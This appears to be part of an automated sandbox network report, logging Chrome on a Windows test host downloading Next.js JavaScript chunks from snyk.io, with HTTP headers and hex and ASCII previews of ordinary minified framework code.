                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799339.1091850
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC13465INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 36 35 5d 2c 7b 38 32 34 31 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6c 2c 6f 29 7b 6f 2e 64 28 6c 2c 7b 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 78 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 7d 29 3b 6c 65 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 6c 65 74 20 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 35 2c 6f 3d 31 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 69
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2165],{8241:function(i,l,o){o.d(l,{d:function(){return n},x:function(){return e}});let e=function(i){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,o=1;switch(!0){case i


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              27192.168.2.54974623.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC516OUTGET /_next/static/chunks/5662.de65dddd439a4870.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="5662.de65dddd439a4870.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"1cccd9c8380e466698d1cbb982d779b5"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/5662.de65dddd439a4870.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::wfls4-1729257050871-b43fc0f38f1e
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:59 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 6259
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799339.1f602e1
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC6259INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 36 36 32 5d 2c 7b 35 31 34 30 34 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 65 29 7b 76 61 72 20 6e 2c 61 3b 6c 65 74 20 6f 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 28 31 30 31 39 34 29 2e 72 24 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 6e 3d 61 2e 66 69 6c 74 65 72 28 6c 3d 3e 21 28 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 69 6e 63 6c 75 64 65 73 28 22 70 61 74 63 68 2d 22 29 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6d 61 70
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5662],{51404:function(l,i,e){var n,a;let o=null===(a=Object.keys(e(10194).r$))||void 0===a?void 0:null===(n=a.filter(l=>!(null==l?void 0:l.includes("patch-"))))||void 0===n?void 0:n.map


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              28192.168.2.54973923.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC375OUTGET /_next/static/chunks/5030.3b020cf8ffddffa3.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="5030.3b020cf8ffddffa3.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"7df67dde87fa6d7cf73573588d4bcb3d"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/5030.3b020cf8ffddffa3.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::vdqw5-1729257060119-69a6f831626a
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:59 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 9887
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799339.1091877
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC9887INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 30 33 30 5d 2c 7b 36 35 38 34 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 61 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6f 3d 61 28 38 35 38 39 33 29 2c 72 3d 61 28 34 35 36 39 37 29 2c 69 3d 61 2e 6e 28 72 29 2c 6e 3d 61 28 36 34 31 31 39 29 2c 73 3d 61 28 31 35 30 32 30 29 2c 6c 3d 61 28 36 32 31 35 29 2c 63 3d 61 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 76 61 72 20 74 2c 61 3b 6c 65 74 7b 63 6f 6c 6f 72 53 63 68 65 6d 65 3a 72 2c 63 6c 61 73 73 4e
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5030],{65840:function(e,t,a){a.d(t,{Z:function(){return u}});var o=a(85893),r=a(45697),i=a.n(r),n=a(64119),s=a(15020),l=a(6215),c=a(44133);function d(e){var t,a;let{colorScheme:r,classN


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              29192.168.2.54974923.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC375OUTGET /_next/static/chunks/6936.f953d0b9b00df349.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="6936.f953d0b9b00df349.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"bc1072f0bc0a6f99055052157e07511f"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/6936.f953d0b9b00df349.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::mzqfp-1729257060058-1fe4cfbb39f0
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:59 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 4822
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799339.10918d4
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC4822INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 39 33 36 5d 2c 7b 31 36 39 33 36 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 64 29 7b 64 2e 72 28 69 29 3b 76 61 72 20 6f 3d 64 28 38 35 38 39 33 29 2c 76 3d 64 28 38 38 30 31 35 29 2c 6e 3d 64 28 39 36 36 32 30 29 2c 65 3d 64 28 32 33 37 35 31 29 2c 75 3d 64 28 37 34 31 32 39 29 2c 61 3d 64 28 38 36 39 34 33 29 2c 73 3d 64 28 36 32 31 35 29 2c 74 3d 64 28 38 36 34 33 37 29 3b 6c 65 74 20 72 3d 6c 3d 3e 28 7b 2e 2e 2e 61 2e 5a 2c 72 65 6e 64 65 72 4e 6f 64 65 3a 7b 2e 2e 2e 61 2e 5a 2e 72 65 6e 64 65 72 4e 6f 64 65 2c 5b 74 2e 42 4c 4f 43 4b 53 2e
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6936],{16936:function(l,i,d){d.r(i);var o=d(85893),v=d(88015),n=d(96620),e=d(23751),u=d(74129),a=d(86943),s=d(6215),t=d(86437);let r=l=>({...a.Z,renderNode:{...a.Z.renderNode,[t.BLOCKS.


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              30192.168.2.54975123.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC375OUTGET /_next/static/chunks/5185.9a7562e082cb91f4.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="5185.9a7562e082cb91f4.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"cdd91066649969be0f00f607a9ad9249"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/5185.9a7562e082cb91f4.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::5r875-1729257060058-2b543b1d9430
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:59 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 5958
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799339.109190e
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC5958INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 38 35 5d 2c 7b 38 32 34 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6c 2c 69 29 7b 69 2e 64 28 6c 2c 7b 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 78 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 6c 65 74 20 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 35 2c 69 3d 31 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 65
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5185],{8241:function(e,l,i){i.d(l,{d:function(){return n},x:function(){return d}});let d=function(e){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,i=1;switch(!0){case e


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              31192.168.2.54975023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC519OUTGET /_next/static/chunks/webpack-1e81cdc3aa31d741.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="webpack-1e81cdc3aa31d741.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"1fa7b981e586665b5650aac09848c9e4"
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 17:43:38 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/webpack-1e81cdc3aa31d741.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::8crq7-1729532627688-e44d48c3b036
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:59 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 8928
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799339.1f6030d
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC8928INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 61 2c 64 2c 63 2c 66 2c 74 2c 62 2c 6e 2c 72 2c 6f 2c 69 3d 7b 7d 2c 75 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 76 61 72 20 61 3d 75 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 29 72 65 74 75 72 6e 20 61 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 64 3d 75 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 63 3d 21 30 3b 74 72 79 7b 69 5b 65 5d 2e 63 61 6c 6c 28 64 2e 65 78 70 6f 72 74 73 2c 64 2c 64 2e 65 78 70 6f 72 74 73 2c 73 29 2c 63 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 63 26 26 64 65 6c 65 74 65 20 75 5b 65 5d 7d 72 65 74 75 72 6e 20 64 2e 65 78 70 6f 72 74 73 7d 73 2e 6d 3d 69 2c 65 3d 5b 5d 2c 73 2e 4f 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 64
                                                                                                                                                                                                                                                                                                              Data Ascii: !function(){"use strict";var e,a,d,c,f,t,b,n,r,o,i={},u={};function s(e){var a=u[e];if(void 0!==a)return a.exports;var d=u[e]={exports:{}},c=!0;try{i[e].call(d.exports,d,d.exports,s),c=!1}finally{c&&delete u[e]}return d.exports}s.m=i,e=[],s.O=function(a,d


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              32192.168.2.54975323.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC375OUTGET /_next/static/chunks/3259-a3f17db6e69abe5a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="3259-a3f17db6e69abe5a.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"9226380572c7d17a92e9224c394fb751"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/3259-a3f17db6e69abe5a.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::2w2cr-1729257060121-38f3851bb59f
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:00 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 11309
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799340.10919e2
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC11309INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 32 35 39 5d 2c 7b 36 31 33 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6c 2c 61 29 7b 61 2e 64 28 6c 2c 7b 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 6c 65 74 20 6f 3d 65 3d 3e 7b 6c 65 74 20 6c 3d 65 2e 74 72 69 6d 28 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 6c 2e 72 65 64 75 63 65 28 28 65 2c 61 2c 6f 29 3d 3e 28 28 30 3d 3d 3d 6f 7c 7c 6f 3d 3d 3d 6c 2e 6c 65 6e 67 74 68 2d 31 29 26 26 28 65 3d 22 22 2e 63 6f 6e 63 61 74 28 65 29 2e 63 6f 6e 63 61 74 28 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3259],{61375:function(e,l,a){a.d(l,{Q:function(){return o}});let o=e=>{let l=e.trim().split(" ");return l.reduce((e,a,o)=>((0===o||o===l.length-1)&&(e="".concat(e).concat(a.charAt(0).to


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              33192.168.2.54974823.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:59 UTC521OUTGET /_next/static/chunks/framework-945b357d4a851f4b.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
